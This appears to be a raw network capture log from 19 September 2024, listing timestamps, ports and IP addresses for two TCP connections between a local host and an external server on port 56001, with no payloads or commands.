Sep 19, 2024 02:38:48.661930084 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.661948919 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.662019968 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.662059069 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.662075996 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.662123919 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.662134886 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.662210941 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.662280083 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.662396908 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.669325113 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.669682026 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.669775963 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.669836044 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.669878006 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.669903994 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.669970036 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670003891 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.670028925 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670100927 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670161963 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670197964 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.670222044 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670262098 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.670299053 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670356989 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670428991 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670491934 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670536041 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.670547009 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670622110 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670680046 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670717955 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.670742035 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670813084 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670860052 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.670874119 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.670912027 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.670948982 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671010971 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671068907 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.671073914 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671147108 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671185017 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.671209097 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671281099 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671302080 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.671341896 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671397924 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671432972 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.671495914 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671565056 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671588898 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.671638012 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671695948 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671756983 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671757936 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.671825886 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671884060 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.671940088 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.671952009 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.672015905 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.672030926 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.672184944 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.725673914 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.840771914 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.840868950 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.840939045 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.841141939 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:49.130997896 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:49.306612968 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:49.307112932 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:49.309546947 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:49.530436039 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:49.530786037 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:49.709721088 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:49.710448980 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:49.936633110 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:49.936862946 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:50.155685902 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.243005991 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.262602091 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.262725115 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.262825966 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.262922049 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.262948990 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.263042927 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.263147116 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.263156891 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.263205051 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.263258934 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.263318062 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.263381958 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.263488054 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.263525009 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.263582945 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.318815947 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.438855886 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.438962936 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439043045 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439122915 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439160109 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.439189911 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439259052 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439327955 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439349890 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.439394951 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439471960 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439529896 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439600945 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439625978 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.439675093 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439732075 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439795971 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.439804077 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439861059 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439917088 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.439950943 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.439951897 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.439990044 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.440047026 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.440109015 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.440227032 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.494365931 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.494476080 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.494756937 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.615425110 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.615592003 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.615731001 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.615837097 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.615889072 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.615919113 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616013050 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.616025925 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616116047 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616267920 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616287947 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.616359949 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616462946 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616533041 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616556883 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.616599083 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616681099 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616738081 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.616746902 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616828918 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616895914 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.616908073 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.616909027 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.616971970 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617042065 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617105961 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617115021 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.617187977 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617254019 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617296934 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.617336988 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617377043 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.617408037 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617485046 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617558956 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617626905 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617624998 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.617686987 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.617712975 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617779016 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617852926 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.617861986 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.617928982 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.618015051 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.618012905 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.618082047 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.618108988 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.618155956 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.618236065 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.618300915 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.618382931 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.618385077 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.618447065 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.618609905 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.670375109 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.670495033 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.670566082 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.670660973 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.670789957 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.670885086 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.794071913 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.794210911 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.794320107 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.794418097 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.794424057 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.794521093 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.794622898 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.794651985 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.794723988 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.794812918 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.794833899 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.794912100 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.794995070 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795027971 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.795089960 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795166969 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795249939 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.795258999 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795336008 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795427084 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795485020 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.795485020 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.795505047 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795598030 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795675993 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795767069 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795844078 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.795844078 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.795845032 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.795936108 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796013117 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796061039 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.796107054 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796220064 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796279907 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.796339035 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796435118 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796518087 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796581984 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.796608925 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796649933 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.796689987 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796780109 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796829939 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.796864033 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.796953917 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797034025 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797075987 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.797125101 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797167063 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.797202110 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797292948 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797369003 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797383070 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.797457933 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797540903 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797631979 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797688961 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.797710896 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797804117 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797867060 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.797879934 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.797971964 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798048019 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798052073 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.798119068 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.798140049 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798245907 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798326015 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798386097 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.798392057 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798474073 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798544884 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798557043 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.798620939 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798695087 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798758030 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798788071 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.798788071 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.798839092 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798906088 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.798973083 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.798985004 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799055099 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799112082 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.799130917 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799196005 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799216986 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799237013 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799257040 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799282074 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799304008 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799307108 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.799324989 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799345016 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799365044 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799385071 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799405098 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799446106 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799449921 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.799449921 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.799536943 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.799632072 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.846144915 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.846194029 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.846229076 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.846261978 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.846297979 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.846326113 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.846354008 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.846384048 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.846410036 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.846546888 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.846589088 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.974414110 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.974531889 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.974631071 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.974694967 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.974699020 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.974772930 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.974832058 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.974891901 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.974944115 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.974962950 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.974992990 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.975019932 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975094080 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975157976 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975214005 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975238085 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.975307941 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975373983 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975405931 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.975457907 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975531101 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975559950 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.975600958 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975677013 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975737095 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975805998 CEST	56001	49783	45.11.229.96	192.168.11.20
